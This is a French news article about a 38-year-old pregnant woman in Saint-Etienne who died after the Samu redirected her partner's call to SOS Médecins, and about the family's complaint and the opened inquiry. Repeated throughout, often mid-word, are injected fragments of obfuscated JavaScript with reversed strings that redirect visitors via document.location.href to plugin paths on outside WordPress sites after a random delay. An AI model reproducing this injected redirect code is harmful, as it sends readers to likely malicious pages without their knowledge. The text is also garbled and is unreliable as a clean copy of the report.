Saint-Etienne: une femme enceinte de six mois meurt après un appel au Samu
$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomx2 blocx3″>Une mère de famille enceinte de son troisième enfant est morte le 9 mars dernier d’un arrêt cardiaque. Son conjoint avait appelé le Samu alors qu’elle se sentait mal. Il a été redirigé vers SOS médecins. Une enquête a été ouverte.
Après la mort de Naomi Musenga, cette jeune Strasbourgeoise toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la souffrance n’a pas été entendue par le Samu, plusieurs cas de décès survenus après des appels au service d’urgences sont passés au crible, à la recherche de possibles négligences. Comme le rapportent nos confrères du Progrès, la famille d’une femme enceinte morte en mars dernier à Saint-Etienne a porté plainte contre le Samu ce jeudi dans la Loire, pour non-assistance à personne en danger.
Agée de 38 ans, cette mère de famille enceinte de six mois attendait son troisième enfant qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and elle a commencé à se sentir mal le 28 février. Son conjoint a immédiatement réagi, appelant le Samu peu avant 17 heures. Il a précisé à l’opérateur au bout du fil que sa femme avait souffert de tachycardie et que les problèmes cardiaques étaient fréquents dans sa famille.
En arrêt cardiaque à l’arrivée de SOS Médecins
Mais au téléphone, son interlocuteur lui a conseillé d’appeler SOS Médecins ou de prendre rendez-vous chez son généraliste. Le conjoint a opté pour la première option et SOS Médecins est arrivé au toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domicile du couple à 17h30. La mère de famille était alors en arrêt cardiaque, en train de convulser.
“Le médecin a pratiqué un massage cardiaque pendant dix minutes, puis il a passé le relais au conjoint de Céline, le temps pour lui d’appeler le Samu”, précise l’un des frères de la victime, interrogé par Le Progrès.
Après ce deuxième coup de fil au Samu, la jeune femme est hospitalisée, vers 19 heures, au CHU de Saint-Etienne. Elle est ensuite placée en coma artificiel et meurt quelques jours plus tard, le 9 mars. Son accouchement avait été déclenché la veille mais elle a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné naissance à un enfant mort-né. Dès le 15 mars, comme le rapporte le quotidien, sa famille a tenté de comprendre ce qui s’était passé.
La direction du Samu local se défend
Ce mardi, ses proches ont rencontré des responsables du Samu et du CHU, avant de finalement porter plainte deux jours plus tard.
“Nous voulons comprendre pourquoi Céline est morte. Est-ce qu’il y a eu une négligence? Nous voulons nous battre pour elle. Cela ne la fera pas revenir. Mais nous ne voulons pas que cela puisse se reproduire”, explique au Progrès le frère de la défunte.
La direction du Samu local, interrogée par France Bleu, précise avoir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné à la famille accès au toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dossier de la victime. François Giraud, le médecin responsable du Samu de la Loire, indique que l'”opérateur” qui a parlé au téléphone avec son conjoint est en réalité un médecin. Il met en garde contre des “amalgames qui portent préjudice à la profession” et appelle à éviter les “parallèles hâtifs” avec le cas de Naomi Musenga. Il nie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout “dysfonctionnement” de l’organisation et de la structure du centre d’appel.
Comme l’annonce LCI ce jeudi, le procureur de la République indique qu’une enquête a été ouverte. L’AFP précise que l’enquête porte sur des soupçons de non-assistance à personne en danger et homicide involontaire. La police judiciaire a été saisie de cette enquête préliminaire.